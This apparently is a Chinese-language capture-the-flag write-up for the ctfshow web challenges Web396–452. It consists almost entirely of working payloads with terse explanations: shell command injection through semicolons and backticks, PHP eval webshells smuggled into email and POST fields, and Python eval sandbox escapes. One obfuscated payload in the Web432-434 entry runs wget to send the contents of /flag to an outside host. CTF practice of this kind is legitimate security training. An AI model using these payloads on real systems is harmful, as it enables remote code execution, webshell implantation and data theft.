Web396-401
payload
http://127.0.0.1/1;echo `cat fl0g.php` > a.html
file://1/1;echo `cat fl0g.php` > a.html
原理:使用;终结语句,然后关键点在后面的echo语句,执行的shell命令Web402-403
payload
url/?url=http://127.0.0.1/1;echo `tac fl0g.php` >a.htmlWeb407
payload
ip=cafe::add
原理: 直接使用类中的静态方法,类::方法Web408
payload
email="<?=eval($_POST[1])?>"@a.php
原理:首先去除空格,用下大佬的话非法字符放在双引号里面绕过email@前缀限制Web409
payload
email="flagsystem($_POST[1]);?>"@123.com
然后post数据
1=cat /flag
原理:https://blog.csdn.net/solitudi/article/details/113778651
Web410
payload
b=on或者b=yes
原理:https://www.w3school.com.cn/php/filter_validate_boolean.asp
Web411
payload
b=oN或者b=yes
原理:https://www.w3school.com.cn/php/filter_validate_boolean.aspWeb412
payload
POST传入 ctfshow=?><?=eval($_POST[1]);
然后访问flag.php
原理:闭合语法Web413
payload
POST传入 ctfshow=*/?><?=eval($_POST[1]);/*
然后访问flag.php
原理:闭合语法Web414
payload
原理: 字符串intval为0
ctfshow=-1Web415
payload
k=Getflag
原理:call_user_func调用的函数不区分大小写Web416
payload
f=ctf::flag
原理:直接通过类调用方法Web417
payload
ctf=show
原理:跟着绕,可以用本地环境调试Web418
payload
key=a&die=0&clear=./a;tac flag.php > a.html
原理:注意看最下面有代码;shell_exec存在代码漏洞,注意使用;闭合掉,然后自己写命令Web419
payload
POST传入code=`cp fla* t`;
原理:使用``代表执行命令,把flag文件复制一下即可
code=eval($_POST[1]);&1=system('cat flag.php');
原理:逃逸Web420
payload
code=nl ../*
原理(没看懂):https://blog.csdn.net/miuzzx/article/details/112692697Web421
payload
code=nl f*
原理:nl查看,搭配通配符Web422
payload
code=nl *
原理:nl查看,搭配通配符Web423
paylaod
?code=__import__('os').popen('cat /flag').read()
?code=open('/flag').read()
Web424
payload
?code=__import__('os').popen('tac /flag').read()
?code=open('/flag').read()Web425
payload
?code=open('/flag').read()Web426-431
payload
?code= open('/flag').read()Web432-434
payload
?code=str(''.__class__.__bases__[0].__subclasses__()[185].__init__.__globals__['__buil''tins__']['__imp'+'ort__']('o'+'s').__dict__['pop'+'en']('wget http://mc.krkr.xyz:8888/?shell=`cat /flag`'))
Web450
payload
?ctfshow=phpinfo^phpinfo^phpinfo
Web451
payload
?ctfshow=phpanfo^phpznfo^phprnfoWeb452
payload
?ctfshow=echo `tac /fla*`;
原理:命令执行